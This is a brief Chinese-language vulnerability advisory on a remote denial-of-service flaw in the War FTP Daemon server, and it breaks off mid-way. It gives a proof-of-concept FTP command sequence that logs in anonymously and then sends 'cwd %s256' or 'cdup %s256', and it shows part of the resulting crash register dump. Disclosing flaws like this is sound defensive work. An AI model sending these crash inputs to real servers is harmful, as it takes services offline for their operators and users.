WarFTPd多个命令处理远程拒绝服务漏洞
War FTP Daemon是32位Windows平台上的FTP服务器。 WarFTPd在处理多个命令的畸形参数时存在漏洞,远程攻击者可能利用此漏洞对服务器造成拒绝服务。 如果向各种命令发送了包含有两次“%s”字符的超长字符串的话,就会导致WarFTPd拒绝服务。例如,发送以下命令: $ ftp target Banner ftp quote user anonymous ftp quote pass bla ftp cwd %s256 或者: ftp cdup %s256 就会导致服务器崩溃: EAX 00000001 ECX 00000073 EDX 00000002 EBX...